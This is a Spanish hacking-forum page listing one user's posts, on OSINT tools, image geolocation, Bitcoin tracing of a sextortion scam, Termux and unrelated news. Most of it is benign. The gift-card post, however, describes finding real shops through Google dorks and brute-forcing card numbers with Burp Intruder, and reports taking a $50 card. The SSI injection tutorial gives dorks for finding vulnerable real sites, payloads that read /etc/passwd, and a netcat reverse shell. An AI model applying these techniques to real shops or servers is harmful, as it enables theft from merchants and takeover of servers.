Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - HATI

Páginas: [1] 2 3 ... 10
1
Hacking / Introducción a la geolocalización de imágenes
« en: Octubre 29, 2019, 12:24:25 pm »


En la actualidad, la cantidad de noticias e información que recibimos sobre diferentes eventos es ingente, lo que facilita la propagación de las tan famosas fake news que venimos escuchando durante estos últimos años.
Con el fin de verificar esta información, existe un conjunto de técnicas que varían en función del tipo de dato a tratar (factchecking). En este post, nos centraremos en la verificación y geolocalización de imágenes (GEOINT / IMINT).
Recomiendo leer la información facilitada al final de este artículo para comprender los posibles usos y técnicas de esta disciplina, ya que, para no aburrir a los lectores, continuaremos con un ejemplo práctico muy sencillo, en el cual se explicará el procedimiento realizado.


Quiztime!
Reverse image search – Google, Yandex, Bing and Tineye

Para este ejemplo utilizaré un reto de @Digit4lbytes en el que se pueden apreciar el uso de diferentes técnicas.
Se trata de averiguar el lugar exacto (coordenadas) en el que se ha tomado la siguiente foto:

Créditos: @Digit4lbytes

Si nunca habéis realizado este tipo de retos, la única información que tenemos es la foto en sí, en la que los metadatos normalmente son inservibles.
Mi primer paso, cada uno puede tener su propia metodología, es realizar una búsqueda de la imagen en los diferentes motores de búsqueda más grandes. A continuación, os dejo un gráfico realizado por @domaintools en el que se comparan las capacidades de los mismos:

Para no tener que realizar la búsqueda manualmente en cada uno de los buscadores, utilizo una extensión open source para navegadores, compatible con Chrome, Firefox y Opera.

Descarga e información: https://github.com/dessant/search-by-image[/li][/list]

La búsqueda en Yandex nos arroja una coincidencia en el primer resultado, fácil, ¿verdad?

Si entramos en la web, comprobamos que la imagen es un nodo de Ingress, un juego de rol basado en ubicaciones GPS. Sin embargo, no conseguimos la localización exacta de la imagen, aunque hemos reducido la búsqueda considerablemente, del mundo entero, a Groninga, una ciudad situada en el norte de los Países Bajos.

Tras un rato intentando conseguir un mapa en el que se puediesen visualizar fácilmente los nodos de Ingress (https://outgress.com/intel/), conseguirlo, y ver que no era factible mirar todos los nodos de la ciudad, se me ocurrió realizar otro tipo de búsqueda, centrándome en el otro elemento destacable de la foto, el edificio.

En mi búsqueda manual en Google Maps, me percaté de que la ciudad de Groninga no tiene edificios muy altos, y en el de la foto se puede apreciar que tiene más de 20 plantas. Buscando en Google tallest buildings groningen, obtenemos lo que parece ser una coincidencia.

Para confirmar y verificar la localización de la imagen, buscamos en Google Maps la dirección asociada, y utilizamos la funcionalidad de Google Street View.
Solución: 53.224878, 6.596530

¡Conseguido! Como os dije, a continuación, listaré una serie de blogs, perfiles de twitter, etc, relacionados con esta temática:


Un saludo, HATI

2
Python / pywhatcms - Librería para utilizar la API de WhatCMS.org
« en: Abril 16, 2019, 07:57:26 am »
Hace un tiempo desarrollé una herramienta que tuvo buena acogida en la comunidad (https://github.com/HA71/WhatCMS). Por temas de comodidad, he creado una librería en python que tiene funcionalidades similares, con el fin utilizarlo en diferentes scripts.

URL: https://github.com/HA71/pywhatcms

La librería proporciona una forma sencilla de utilizar la API whatcms.org para detectar 467 sistemas de gestión de contenido (CMS) diferentes

Instalación
Código: Python
  1. pip install pywhatcms

Uso
First of all, import pywhatcms:
Código: Python
  1. from pywhatcms import whatcms

Query a domain:
Código: Python
  1. whatcms('API-KEY', 'blog.underc0de.org')

Obtain info:
Código: Python
  1. whatcms.name
  2. whatcms.code
  3. whatcms.confidence
  4. whatcms.cms_url
  5. whatcms.version
  6. whatcms.msg
  7. whatcms.id
  8. whatcms.request
  9. whatcms.request_web

3
Hacking / Sextortion Scam - Follow the money
« en: Diciembre 12, 2018, 05:42:01 am »

Sé que hay algunos artículos sobre este tema, pero no vi a nadie que intentara rastrear el dinero:



Hace unos meses apareció una campaña de phishing un tanto peculiar. La campaña de mensajes de "sextortion", en la que se menciona una contraseña de la víctima y se solicita una cantidad X de dinero a cambio de no publicar contenido sensible de la misma.

Un ejemplo de fragmento de estos correos puede ser el siguiente:

Citar
I am well aware shitpassword is your password. Lets get right to the point. You do not know me and you're probably thinking why you're getting this mail? No-one has paid me to investigate about you.

Well, I actually setup a software on the adult streaming (pornographic material) website and you know what, you visited this site to have fun (you know what I mean). When you were viewing videos, your web browser began working as a Remote Desktop that has a key logger which provided me access to your screen and web camera. Just after that, my software gathered your complete contacts from your Messenger, social networks, as well as e-mail . And then I created a video. 1st part shows the video you were watching (you have a good taste ; )), and next part shows the view of your web camera, and its you.

You will have not one but two choices. We will read up on each of these solutions in aspects:

Very first solution is to neglect this email message. In this situation, I am going to send out your very own video to just about all of your contacts and think concerning the awkwardness you can get. And consequently should you be in an important relationship, precisely how it is going to affect?

Next alternative is to give me $5000. Let us name it as a donation. Consequently, I will straight away eliminate your video recording. You could go on your way of life like this never happened and you are never going to hear back again from me.

You'll make the payment through Bitcoin (if you do not know this, search for "how to buy bitcoin" in Google).

BTC Address to send to: 1MkB7HxxxxxqiNAiJUd7DCTEbAyVG9ab2y

[...]

En los correos electrónicos se solicitaba como pago desde $ 1000 hasta $ 7000 en algunas ocasiones, dependiendo de la variante de mensaje recibido:

Citar
Number 2 option would be to pay me $5000. Let us regard it as a donation. In this instance, I will quickly discard your video. You can keep on your way of life like this never occurred and you surely will never hear back again from me.

Citar
2nd option is to pay me $1000. We are going to name it as a donation. In such a case, I will straightaway eliminate your video recording. You could go on with your daily ro utine like this never occurred and you will not ever hear back again from me.

Citar
Other alternative will be to give me $6000. We will regard it as a donation. Then, I most certainly will straightaway erase your video recording. You will continue on your way of life like this never occurred and you will not ever hear back again from me.

Tenía curiosidad, así que decidí investigar este fraude un poco más a fondo. Recolecté cerca de 1500 correos electrónicos de personas que notificaron que eran víctimas de esta estafa. Para ello recurrí al scrapping de varias web en las que se informa de estos casos. Extraje las direcciones de bitcoin y he comprobé a través de la API de blockchain cuál de ellas ha recibido un pago.

Código: Bash
  1. cat address.txt | while read line; do
  2.     received=`curl -s [url]https://blockchain.info/q/getreceivedbyaddress/[/url]$line`
  3.     sent=`curl -s [url]https://blockchain.info/q/getsentbyaddress/[/url]$line`
  4.     balance=`curl -s [url]https://blockchain.info/q/addressbalance/[/url]$line`
  5.     first=`curl -s [url]https://blockchain.info/q/addressfirstseen/[/url]$line`
  6.     echo "$line,$balance,$received,$sent,$first" >> sexscamdirecctions.csv
  7. done
  8. echo ""
  9. echo "FINISH"
  10. echo ""

De toda la muestra, alrededor de 325 direcciones han recibido un pago. Esto significa que alrededor del 20% de las víctimas están pagando (en caso de que el patrón de la muestra continúe). Te puedes hacer una idea de la cantidad de dinero que se puede ganar detrás de esta estafa.

Pagos confirmados de 322 direcciones implicadas en la estafa - Maltego CE


En total, las direcciones han recaudado 176.010 dólares. Si seguimos el rastro de las transacciones, podemos ver cómo los fondos terminan en su gran mayoría en la cartera caliente de Binance y en otra dirección aparentemente asociada a Poloniex.



También he detectado algunas direcciones intermedias que han movido mucho dinero, y direcciones finales interesantes como las siguientes:

Seguimiento de las transacciones - Maltego CE

Otra dirección que me llamó la atención por haberla visto antes relacionada con casos de estafas fue la siguiente:


Esta dirección aparece relacionada con casos de fraude, en los siguientes artículos (muy recomendable) se pueden apreciar estos datos:


Aparte de estas direcciones, hay demasiadas direcciones relevantes para contar los detalles de cada una en el post.

Como se puede observar, la cantidad de dinero que se mueve entre estas direcciones es abrumadora. Esto me hace pensar en la posibilidad de que las mismas direcciones se utilicen para mover fondos de otras estafas.

El seguimiento de las transacciones se vuelve bastante complicado, con más de 10.000 direcciones que aparecen en el seguimiento de un solo pago.

Seguimiento de un pago - Maltego CE


En este momento, debido a la falta de recursos y tiempo, creo que es inviable para mí continuar la investigación.

Si alguien quiere colaborar o necesita los datos, podéis contactarme por aquí.

Versión en inglés: Sextortion Scam - Follow the money

4

Normalmente, cuando tenia que hacer un barrido de documentos públicos de una empresa para analizar sus metadatos, usaba FOCA. Creo que funciona bastante bien para este propósito, para lo demás...

Recientemente descubrí PowerMeta, un script en Powershell que realiza esta tarea de forma más eficiente. Es más rápido y la cantidad de metadatos puede que obtener de un documento es increíble. El único contra que le veo a diferencia de FOCA, es que solo busca en Google y Bing, aunque suele ser suficiente, a veces suelen indexarse otros documentos en diferentes buscadores.

Lo podéis descargar del siguiente repositorio: https://github.com/dafthack/PowerMeta


Requisitos:

  • PowerShell versión 3.0 o posterior


Uso:

Lo primero que debemos hacer es importar el módulo:

Código: PowerShell
  1. C:\> powershell.exe -exec bypass
  2. PS C:\> Import-Module PowerMeta.ps1


- Búsqueda básica:

Código: PowerShell
  1. PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com

Por defecto, busca "pdf, docx, xlsx, doc, xls, pptx y ppt".
Una vez que haya terminado de elaborar esta lista, le preguntará al usuario si desea descargar los archivos del dominio de destino. Después de descargar los archivos, se volverá a solicitar la extracción de los metadatos de esos archivos.


- Cambio de FileTypes y descarga y extracción automática:

Código: PowerShell
  1. PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com -FileTypes "pdf, xml" -Download -Extract


- Extraer todos los metadatos de archivos en un directorio:

Código: PowerShell
  1. PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com -ExtractAllToCsv all-target-metadata.csv

Cuando abrais el archivo csv, vais a ver la cantidad de datos extraidos, que no son pocos.

La herramienta tiene más opciones para realizar búsquedas personalizadas que se ajusten a nuestros requisitos:

Código: PowerShell
  1. TargetDomain        - The target domain to search for files.
  2. FileTypes           - A comma seperated list of file extensions to search for. By default PowerMeta searches for "pdf, docx, xlsx, doc, xls, pptx, ppt".
  3. OutputList          - A file to output the list of links discovered through web searching to.
  4. OutputDir           - A directory to store all downloaded files in.
  5. TargetFileList      - List of file links to download.
  6. Download            - Instead of being prompted interactively pass this flag to auto-download files found.
  7. Extract             - Instead of being prompted interactively pass this flag to extract metadata from found files pass this flag to auto-extract any metadata.
  8. ExtractAllToCsv     - All metadata (not just the default fields) will be extracted from files to a CSV specified with this flag.
  9. UserAgent           - Change the default User Agent used by PowerMeta.
  10. MaxSearchPages      - The maximum number of pages to search on each search engine.

5
Hacking / Namechk | Herramienta OSINT para búsqueda de usuarios
« en: Junio 06, 2018, 09:05:32 am »

A la hora de realizar investigaciones en fuentes abiertas, podemos encontrarnos con perfiles que pueden estar asociados a un determinado "nick".

Para obtener más información sobre ese perfil, podemos usar técnicas avanzadas de búsqueda en google, bing y otros metabúscadores, pero en muchas ocasiones los perfiles de los usuarios no se encuentran indexados, lo que nos supone un problema.
Aparte de otros métodos, cuando me encuentro en esa situación suelo revisar siempre la web de namechk.com.

Esta web ofrece una API, aunque es de pago. Por este motivo me propuse elaborar una herramienta basada en este servicio que no necesitase utilizar su propia API, además de proporcionarle valor añadido mediante la capacidad de realizar diferentes tipos de búsqueda (en la web esto no se permite).

Las webs soportadas por namechk.com, y por ende, las de la herramienta, son las siguientes:




REPOSITORIO:

Url: https://github.com/HA71/Namechk

Código: [Seleccionar]
git clone [url]https://github.com/HA71/Namechk.git[/url]


USO:

- Buscar nombre de usuario disponible:
Código: [Seleccionar]
./namechk.sh <username> -au
- Busque nombre de usuario disponible en sitios web específicos:
Código: [Seleccionar]
./namechk.sh <username> -au -co
- Buscar lista de nombres de usuario disponibles:
Código: [Seleccionar]
./namechk.sh -l -au
- Buscar nombre de usuario utilizado:
Código: [Seleccionar]
./namechk.sh <username> -fu
- Buscar nombre de usuario usado en sitios web específicos:
Código: [Seleccionar]
./namechk.sh <username> -fu -co
- Buscar lista de nombres de usuario usados:
Código: [Seleccionar]
./namechk.sh -l -fu


Un saludo, HATI  ;D

6
Hacking / HackingPhone | Tus herramientas de hacking en el móvil
« en: Mayo 07, 2018, 05:27:55 am »

Mucha gente habla de Kali Nethunter o los PwnPhones cuando se pretende tener una herramienta de hacking portatil. Estas soluciones requieren tener un módelo de teléfono específico y realizar ciertas configuraciones, aunque ya hay apps que te instalan la versión de Kali NetHunter en cualquier móvil.

Hoy os traigo una solución muy recomendada: TERMUX

Que mejor explicación sobre Termux que la que dan los propios autores:
Cita de: termux.com
Termux es un emulador de terminal de Android y una aplicación de entorno Linux que funciona directamente sin necesidad de root ni configuración. Se instala automáticamente un sistema base mínimo; hay paquetes adicionales disponibles con el administrador de paquetes APT.

Básicamente nos permite emular una terminal de Linux en nuestro teléfono Android. Lo podeís descargar desde Play Store o F-Droid, os dejo los enlaces:



Características:

  • Soporte de bash y zsh.
  • Editar archivos con nano y vim.
  • Acceder a servidores a través de ssh.
  • Desarrollar en C con clang, make y gdb.
  • Python, Ruby, Perl y Node.js
  • Git y subversión.
  • Ejecuta juegos basados en texto con frotz.


Con la app instalada, lo único que hay que hacer es ejecutarla, y se nos abrirá una sesión en una terminal, podemos abrir más si queremos. Recomiendo instalar Hacker´s Keyboard para un uso más cómodo.

Ahora solo nos queda instalar nuestras herramientas. Nmap viene integrado cómo paquete, por lo que la isntalación es bastante sencilla:
Código: Bash
  1. pkg install nmap
O
Código: Bash
  1. apt install nmap


Termux ofrece en su wiki una guía de instalación de Metasploit que resumiré a continuación:
Código: Bash
  1. cd $HOME
  2. pkg install wget
  3. wget [url]https://Auxilus.github.io/metasploit.sh[/url]
  4. bash metasploit.sh

Y para iniciarlo, lo ejecutamos cómo siempre:
Código: Bash
  1. ./msfconsole



Si quereís añadir más herramientas, el siguiente script en python permite descargar más de 50 diferentes según la tipología de ataque.

LazyMux
Github: https://github.com/Gameye98/Lazymux


Espero que os guste, es una opcion bastante a tener en cuenta y que puede venir muy bien en determinadas ocasiones.

Un saludo, HATI  ;D

7
Hacking / GiftCards loves BurpSuite
« en: Abril 02, 2018, 05:35:04 pm »



Actualmente, la mayoría de las empresas relacionadas con la venta al consumidor han tenido que transformarse completamente pata adaptar su modelo de negocio a internet, que también ha ofrecido la posibilidad de crear una tienda sin apenas recursos. Esto ha dado lugar a una gran competencia y a numerosas técnicas de captación de clientes, desde promociones hasta nuestras protagonistas las tarjetas regalo o "gift cards".

La intención del post es meramente educativa y no me hago responsable del uso que haga la gente de esta información.


Generalmente, las Gift Cards suelen estar asociadas a una cuenta de usuario, sobre todo las grandes marcas cómo Nike, Apple, Amazon, etc... tienen buenas medidas de protección.
Las páginas web que utilizan este tipo de tarjetas online, permiten comprobar el crédito del que disponen las mismas, y aquí es donde viene el problema. Si la validación de la tarjeta no se hace de forma segura, es posible hacer scraping y comprobar las tarjetas con crédito para su posterior uso.

Las tarjetas regalo se protegen con los siguientes medios en la mayoría de los casos:

  • Cuenta de usuario
  • Pin secundario
  • Captcha
  • Verificación vía e-mail

Ejemplo de Giftcard check


Como he mencionado antes, Internet ha abierto las puertas a cualquier persona que quiera abrir un negocio, lo que supone miles y miles de tiendas online. Alguien que usa un sistema de Gift Cards debe saber los riesgos que supone, pero gracias a los buscadores cómo google podemos hacer una pequeña búsqueda para conseguir lo que queremos:

Una tienda con Gift Cards, que no use cuentas, ni pin secundario, ni captcha, ni verificación mail para comprobar el saldo de la tarjeta, lo que en google se traduce como
Código: [Seleccionar]
inurl:giftcardbalance OR inurl:giftcard + "check" -pin -captcha
Es solo un ejemplo, con un poco de imaginación se pueden obtener mejores resultados. Una vez llegados a este paso, podemos comprar un par de tarjetas para ver si siguen algún patron o podemos mejorar nuestro dork para obtener algo más de información:
Código: [Seleccionar]
inurl:giftcard + "check" +  "balance"  -pin -captcha + "digits"
Resultados de la búsqueda


También podemos obtener información de las respuestas:

Respuesta de tienda online


Cuando tengamos una web que cumpla los requisitos y sepamos el patron de las tarjetas, debemos crear un diccionario para usarlo en Burpsuite. Podemos hacerlo con el comando seq, crunch o cualquier otro generador de wordlists.

Configuramos el navegador y obtenemos la petición que comprueba el crédito:

Petición

Y observando la rspuesta, se comprueba que la petición es correcta.



Tras esto lo mandaremos al intruder y configuramos el ataque con el diccionario que hemos creado anteriormente. Unicamente necesitamos introducir un payload, que será el número de tarjeta a comprobar para cada petición, y configurar la captura de datos:

Burpsuite Intruder

Burpsuite Sniper Attack


Como podeis ver, solo ha hecho falta realizar 9 peticiones para obtener una tarjeta de 50$. Sería posible realizar el ataque para comprobar todas las tarjetas con saldo existentes en la web, y en este caso serían muchas, ya que es un sistema intermediario que se dedica a los pagos seguros, ofreciendo el servicio de Gift Cards a muchas webs.

Esto deja en evidencia la seguridad de las compras online en la actualidad. Es conveniente siempre comprar en webs de confianza o con reputación, y no realizar pagos de manera insegura.


Un saludo, HATI  ;)

8
Hacking / WhatCMS | Detección y explotación de CMS
« en: Marzo 20, 2018, 09:08:08 am »

Introducción

Cita de: Wikipedia
Un sistema de gestión de contenidos (CMS) es un programa informático que permite crear una estructura de soporte (framework) para la creación y administración de contenidos, principalmente en páginas web, por parte de los administradores, editores, participantes y demás usuarios.

Os dejo una infografía que os aclarará las cosas un poco:

Clic para aumentar


Aunque parezca mentira, se estima que al menos la mitad de las webs activas actualmente utilizan un CMS, y en el 30% de los casos es Wordpress. Este hecho hace que a la hora de realizar auditorías web, en numerosas ocasiones nos encontremos con plataformas de este tipo. Este hecho me motivó a crear la siguiente herramienta para facilitar la tarea de detectar el CMS de una web y buscar herramientas específicas para dicho CMS con el fin de testear su seguridad.


WhatCMS.sh

WhatCMS.sh utiliza la API de whatcms.org y puede detectar más de 330 tipos de CMS diferentes. Una vez detectado, te muestra herramientas de hacking para testearlo ofreciendote la posibilidad de descargarlas automáticamente.

Para usarlo es necesario adquirir la API key desde la siguiente url: https://whatcms.org/Subscriptions

Descarga:

Repo: WhatCMS.sh

Código: [Seleccionar]
git clone [url]https://github.com/HA71/WhatCMS.git[/url]


Uso:

Código: [Seleccionar]

Usage:./whatcms.sh example.com <-wh (opcional)>

-h          Display help message
-wh         Check hosting details
--tools     Display tools information


Nota: la API tiene una restricción de 10 segundos.

Clic para aumentar


Por el momento contiene 44 herramientas de seguridad que abarcan más de 140 CMS. Estoy planeando añadir más, asique si quereis colaborar, podeis hacerlo por aquí dejando la tool que quereis añadir. Aseguraos de que no esté ya en la lista.

Herramientas incluidas:





Un saludo, HATI  ;)

9
Off Topic / ASCII art. | Covierte cualquier imágen a formato ASCII
« en: Enero 27, 2018, 08:53:12 am »

Si os gusta el ASCII art, como a mí, en este post aprenderéis ver todas vuestras imágenes en este formato, con la capacidad de editar algunos parámetros para que quede a nuestro gusto.


INSTALACIÓN:

En primer lugar hay que instalar los prerequisitos:

Código: Bash
  1. apt-get install netpbm

Y posteriormente la herramienta:

Código: Bash
  1. apt-get install aview


Bastante sencillo, ¿verdad? El uso tampoco tiene mucha complicación.


USO:

Uso básico:

Código: Bash
  1. asciiview <imégen>


Para usar los siguientes parámetros, hay que ejecutar el siguiente comando:

Código: Bash
  1. asciiview <imégen> -driver linux



  • Incrementar el contraste --- (.)
  • Disminuir el contraste      --- (,)
  • Incrementar el brillo:        --- (>)
  • Disminuir el brillo:             --- (<)
  • Aumentar el Zoom:            --- (Z), (+)
  • Disminuir el Zoom:             --- (z), (-)


Un saludo, HATI  ;)

10
Dudas y pedidos generales / Tipo de hash
« en: Enero 14, 2018, 04:44:05 pm »
Eso mismo. ¿Alguien sabe qué tipo de hash es?

Código: [Seleccionar]
1f1767b5696e79116b11ecc7f28827
a6fa1f788eb5c21f03516ec162b022
1e3e7c05f0651868110e46ee623738
23e23065fd93fdb4d71efda8fb3210

No es "Juniper NetScreen/SSG (ScreenOS)"


11


Imagen que colgó un usuario en la web EcoMotoring News:

Con el Bitcoin cotizando por encima de los 11.000 dólares y subiendo un 30% al mes, es lógico que todo el mundo se vuelva loco minando Bitcoins, que es el término que se usa para ejecutar el algoritmo matemático que te permite conseguir Bitcoins, y después puedes vender o especular con ellos. Al menos, hasta que estalle la burbuja...

Minar criptomonedas da beneficios hoy en día, si superas sus dos grandes barreras: el alto coste del hardware (no vale un simple ordenador), y el alto consumo eléctrico. El dueño de un flamante coche eléctrico Tesla Model S ha ideado una nuevo sistema para reducir gastos: usar la batería eléctrica del Tesla Model S para minar criptomonedas gratis. En Estados Unidos los dueños de coches Tesla pueden recargar la batería gratis en los Supercargadores esparcidos por todo el país.


Un equipo de minado está compuesto por chips especiales y un puñado de potentes tarjetas gráficas trabajando en paralelo, que cuestan miles de euros. Y como el que más potencia aporta más se lleva, o juegas fuerte o pierdes. Al coste del hardware hay que añadir el consumo que conlleva un equipo con docenas de tarjetas gráficas funcionando las 24 horas.

La web Motherboard ha estado analizando la foto para averiguar si es viable minar criptomonedas con un Tesla Model S.

En la imagen se pueden ver cuatro placas base conectadas a la batería, con capacidad para cuatro tarjetas gráficas cada una, asi que se podrían alimentar 16 tarjetas gráficas. No se ven chips ASIC que se usan para minar Bitcoins, así que lo más probable es que mine otra criptomoneda, Ethereum.

Dejando a un lado problemas que parecen irresolubles (16 GPUs calentarían en exceso el interior del coche y no funcionarían sin ventilación, transportar el hardware en el maletero para recargar todos los días en el Supercargador es inviable), supongamos que el sistema de minado funciona.

Según Motherboard, alimentar este minero de criptomonedas durante 24 horas equivale a conducir el Tesla Model S durante 278 kilómetros. Asumiendo que funciona durante las 24 horas del día y que la cotización del Ethereum no baja de los 450 dólares, se pueden ganar unos 675 dólares al mes, que es el coste de adquirir un Tesla Model S mediante leasing... pero a cambio de no conducirlo ni un minuto, pues tendría que minar criptomonedas las 24 horas del día.

¿Te compras un Tesla Model S para no usarlo y ganar 600 dólares al mes? Y eso sin considerar el problema de recargar la batería... No parece un sistema de minado demasiado práctico, aunque sí muy original.


Fuente: computerhoy.com

12
Off Topic / CLI SERIES Nº1 | Sigue la NBA desde tu terminal - NBA-Go
« en: Noviembre 28, 2017, 09:51:32 am »

Si os gusta usar la línea de comandos, y os gusta la NBA, no te puedes perder esta herramienta. Con nba-go puedes ver los datos de partidos en vivo, estadísticas de equipos, información sobre jugadores, etc, y todo desde la terminal. La información la obtiene de la web oficial de la NBA http://stats.nba.com/, por lo que todos los datos son fiables.

Para que funcione correctamente, hay que asegurarse de que tenemos instalado Nodejs y NPM, si no los tenemos, podemos descargarlos e instalarlos fácilmente con los siguientes comandos:

  • Descargar e instalar NODEjs
    Código: Bash
    1.     git clone git://github.com/nodejs/node.git
    2.  
    3.     cd node
    4.  
    5.     make install
    6.  
    7.     cd ..
  • Descargar e instalar NPM
    Código: Bash
    1.     git clone git://github.com/npm/npm.git
    2.  
    3.     cd npm
    4.  
    5.     make install
    6.  
    7.     cd ../

    Una vez tengamos los prerequisitos, hay que clonar su repositorio de Github:

    Código: Bash
    1. git clone [url]https://github.com/xxhomey19/nba-go.git[/url]

    Y para instalar, basta con el siguiente comando:

    Código: Bash
    1. npm install -g nba-go




    Su uso es bastante sencillo, podemos elegir entre estadísticas de partidos o estadísticas de jugadores. El comando básico es sería el siguiente:

    Código: Bash
    1. nba-go game


    Código: Bash
    1. nba-go player <jugador>



    Ofrece mucha más flexibilidad a la hora de mostra datos, podéis filtrar por fecha, finales, equipos... si queréis aprender más sobre esta tool, os dejo la guía oficial:

    NBA-Go: https://www.npmjs.com/package/nba-go


    Un saludo, HATI

    13
    Galería / Nueva firma
    « en: Noviembre 27, 2017, 08:33:25 am »
    Nueva firma:



    Si algún usuario quiere una firma personalizada puedo intentar sacarle algo de tiempo.

    Usuarios con al menos 2 puntos de reputación y más de 50 post.

    14
    Hacking / Explotando SSI Injection desde 0
    « en: Noviembre 25, 2017, 03:40:56 pm »


    Introducción
    -------------------------------------------------------

    Estos días he estado testeando una aplicación web de un cliente y me he encontrado con una vulnerabilidad que desconocía (seguro que para muchos será conocida). Se trata de "Server-Side Includes (SSI) Injection", y para saber bien de que se trata, primero hay que conocer que es una directiva SSI.

    Cita de: Traducción - OWASP SSI
    Las SSI son directivas presentes en las aplicaciones Web utilizadas para alimentar una página HTML con contenido dinámico. Son similares a los CGIs, excepto que los SSIs se utilizan para ejecutar algunas acciones antes de que se cargue la página actual o mientras se visualiza la página. Para ello, el servidor web analiza SSI antes de suministrar la página al usuario.

    Las implementaciones comunes de SSI proporcionan comandos para incluir archivos externos, para establecer e imprimir variables de entorno CGI del servidor web, y para ejecutar scripts CGI externos o comandos de sistema.

    Vamos a profundizar un poco y ver que se puede hacer con una directiva SSI, para comprender porqué es muy peligroso realizar una mala configuración de estas:


    • La sintáxis es la siguiente:
      Código: ASP
      1. <!--#function attribute=value attribute=value ... -->


    • Se pueden usar variables de entorno, por ejemplo, para obtener la hora:
      Código: ASP
      1. <!--#echo var="DATE_LOCAL" -->


    • También se pueden incluir ficheros:
      Código: ASP
      1. <!--#include virtual="/footer.html" -->


    • O incluso, y peligroso, ejecutar comandos:
      Código: ASP
      1. <pre>
      2. <!--#exec cmd="dir" -->
      3. </pre>


    • Es posible declarar variables y usar expresiones condicionales:
      Código: ASP
      1. <!--#set var="modified" value="$LAST_MODIFIED" -->
      2.  
      3.  
      4. Good <!--#if expr="%{TIME_HOUR} <12" -->
      5. morning!
      6. <!--#else -->
      7. afternoon!
      8. <!--#endif -->



      Los servidores más conocidos que soportan este tipo de directivas son Apache, Nginx, ISS, Lighthttpd y LiteSpeed, y generalmente se encuentran en archivos con extensión ".shtml", ".stm" o ".shtm", aunque no siempre es así.

      Por lo tanto, la vulnerabilidad es básicamente una inyección de código que explota directivas SSI, y que, dependiendo de la configuración del servidor, puede conllevar, entre otros casos, a la ejecución de código arbitrario en el server, inclusión de archivos, ejecución de código javascript...

      Fuetntes y más información:

      - https://es.wikipedia.org/wiki/Server_Side_Includes
      - https://httpd.apache.org/docs/current/howto/ssi.html
      - https://nginx.org/en/docs/http/ngx_http_ssi_module.html
      - https://redmine.lighttpd.net/projects/1/wiki/docs_modssi


      Una vez explicado esto, podemos ir a la acción  8)


      PoC
      ---------------------------------

      Para buscar aplicaciones vulnerables, podemos usar dorks, os dejo algunos de ejemplo, aunque se pueden crear más elaborados:

        - inurl:bin/Cklb/
        - inurl:login.shtml
        - inurl:login.shtm
        - inurl:login.stm
        - inurl:search.shtml
        - inurl:search.shtm
        - inurl:search.stm
        - inurl:forgot.shtml
        - inurl:forgot.shtm
        - inurl:forgot.stm
        - inurl:register.shtml
        - inurl:register.shtm
        - inurl:register.stm
        - inurl:login.shtml?page=

      Por suerte, el entorno de pruebas bWAPP nos permite testear este tipo de ataques sin hacer daño a nadie.  ;D

      Para montar el lab, solo es necesario subir el contenido de bWAPP a un servidor con PHP y base de datos, podeís usar xampp o similar para hacer esto. Os dejo una guía por si alguien quiere detalles de la instalación:


      Una vez tengamos todo el lab montado, hay que configurar un proxy para interceptar las peticiones, yo usaré BurpSuite. Seleccionamos la opción correspondiente a SSI Injection y ya tenemos todo listo para comenzar.



      En el supuesto de un escenario real, lo primero que debemos hacer para testear la vulnerabilidad sería validar los parámetros de entrada. Haciendo una petición con los caracteres que debe filtrar una directiva SSI lo comprobamos.

      Caracteres: < ! # = / . " - > and [a-zA-Z0-9]

      Petición

      Respuesta


      Se puede ver claramente que noha filtrado nada, ya que nos devuelve los valores introducidos.

      A continuación, probemos con una variable de entorno para ver el resultado:

      Variable de entorno: <!--#echo var="DATE_LOCAL" -->

      Petición

      Respuesta

      La variable introducida contiene el valor de la fecha del sistema del servidor, lo que significa que podemos interactuar con él. Vamos a comprobar si tenemos acceso a datos sensibles cómo pueden ser los directorios /etc/passwd o /etc/shadow.

      Directivas enviadas:

      • <!--#exec cmd="whoami"-->
      • <!--#exec cmd="cat /etc/passwd"-->

      Respuesta

      Por último, veamos cómo obtener una shell para tener total control del servidor. Para ello, tenemos que abrir una conexión con netcat, para luego enviar una directiva que indique al server la conexión.


      Comando netcat:

      [/list]
      Código: Bash
      1. nc -nlvp -p 1337

      Directiva: <!--#exec cmd="nc 192.168.xxx.xxx 1337 -e /bin/bash"-->

      Shell:


      Espero que os haya gustado. Un saludo, HATI

      15

      La semana pasada se hablaba de que se iba a lanzar antes de Navidad un jailbreak para para PS3 que iba a permitir piratear una gran cantidad de consolas que tuviesen un firmware oficial 4.82 o anterior mediante la instalación de un Custom Firmware (CFW). Dicho y hecho, ahora ya está disponible la primera versión que puede instalarse desde el OFW 4.82 para poder ejecutar modificaciones y copias de juegos.


      PS3Xploit: el pirateo vuelve a PS3

      Hasta ahora era necesario comprar un Hardware Flasher como un E3 Flasher para hacer downgrade al firmware 3.55 (modelos de consola 25xx o anterior. Sin embargo, con con PS3Xploit se puede realizar todo el proceso a través de software sin tener que abrir la consola, y en tan sólo unos pocos minutos.

      Lo que hace este proceso es, básicamente, parchear el CoreOS del chip NOR o NAND. Una vez instalado, cuando reiniciemos la consola podemos instalar el Custom Firmware, pasando directamente de un firmware oficial a uno personalizado. El proceso ha de realizarse desde el firmware oficial 4.82, ya que se flashea a una versión modificada de ese mismo 4.82.

      Entre los modelos soportados encontramos todos los modelos de la PS3 Fat y los modelos de la Slim hasta 25xx que vinieran de serie con el firmware 3.56 o anterior. Los modelos SuperSlim y los modelos Slim 3xxx, 4xxx no son compatibles. Los modelos 2xxx que vinieran de serie con firmware 3.60 o superior tampoco son compatibles (consolas vendidas después de diciembre de 2010 más o menos). Según afirman sus creadores, las consolas Slim y SuperSlim que actualmente no son compatibles podrían serlo en los próximos meses.


      PS3Xploit permite ejecutar copias de juegos

      Con PS3Xploit y el CFW 4.82 instalado, los usuarios pueden realizar todo tipo de modificaciones en su consola. Por ejemplo, pueden ejecutar emuladores o copias de sus juegos. Si tienes una PlayStation 3 con el lector de discos roto, puedes copiar tus juegos a un disco duro o SSD externo para jugarlos.

      Las instrucciones de instalación se encuentran en este enlace en inglés de PSX-Place, o también tenéis una guía de instalación disponible en el foro de PS3 de El Otro Lado en español. Si lo hacéis corréis el riesgo de poder estropear vuestra consola. Además, si os conectáis a PSN incurrís en el riesgo de que os baneen la consola y vuestra cuenta, por lo que es conveniente que no os conectéis si lo instaláis.


      Fuente: adslzone.net

      16


